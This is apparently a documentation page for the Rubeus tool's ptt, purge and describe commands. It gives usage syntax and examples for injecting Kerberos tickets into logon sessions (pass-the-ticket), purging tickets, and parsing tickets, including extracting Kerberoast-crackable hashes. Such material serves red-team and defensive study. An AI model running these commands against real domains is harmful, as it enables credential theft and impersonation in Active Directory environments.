ptt / purge / describe
Ticket management: inject, remove, and inspect Kerberos tickets.
ptt β Pass the Ticket
Inject a TGT or service ticket into the current (or specified) logon session.
Usage
Rubeus.exe ptt </ticket:<ticket> | /ticket:<file>.kirbi> [/luid:<luid>]
Options
/ticket:<ticket>β base64 ticket blob or path to .kirbi file/luid:<luid>β target logon session ID (elevation required)
Examples
# Apply ticket to current session
Rubeus.exe ptt /ticket:<ticket>
# Apply to another session (elevated)
Rubeus.exe ptt /luid:0x474722b /ticket:<ticket>
purge β Purge Tickets
Remove all Kerberos tickets from the current (or specified) logon session.
Usage
Rubeus.exe purge [/luid:<luid>]
Options
/luid:<luid>β target logon session to purge (elevation required)
Examples
# Purge current session
Rubeus.exe purge
# Purge specific session (elevated)
Rubeus.exe purge /luid:0x474722b
describe β Describe Ticket
Parse and display information about a TGT or service ticket. Optionally decrypt the EncTicketPart to show PAC contents.
Usage
Rubeus.exe describe </ticket:<ticket> | /ticket:<file>.kirbi> [/servicekey:<hash>] [/krbkey:<hash>] [/asrepkey:<hash>] [/serviceuser:<username>] [/servicedomain:<domain>] [/desplaintext:<first-block-text>]
Options
/ticket:<ticket>β base64 blob or .kirbi file path/servicekey:<hash>β service account key to decrypt EncTicketPart and verify ServerChecksum/krbkey:<hash>β krbtgt key to verify KDCChecksum and TicketChecksum/asrepkey:<hash>β AS-REP session key (for PKINIT U2U scenarios)/serviceuser:<username>β form crackable AES hash from AES256 service ticket/servicedomain:<domain>β domain for/serviceuser(required with that flag)
Examples
# Basic description
Rubeus.exe describe /ticket:<ticket>
# Show decrypted PAC (need service/krbtgt key)
Rubeus.exe describe /ticket:<ticket> /servicekey:<aes256-key>
# Extract Kerberoast hash from RC4 service ticket
Rubeus.exe describe /ticket:<service-ticket>
# Get AES Kerberoast hash
Rubeus.exe describe /ticket:<ticket> /serviceuser:<username> /servicedomain:<domain>
Notes
- If ticket is a service ticket encrypted with RC4, a Kerberoast-compatible hash (
$krb5tgs$23$...) is automatically extracted - If ticket is AES-encrypted and
/servicekeyis not provided, only metadata is shown - The PAC includes: LogonInfo, ClientName, UpnDns, ServerChecksum, KDCChecksum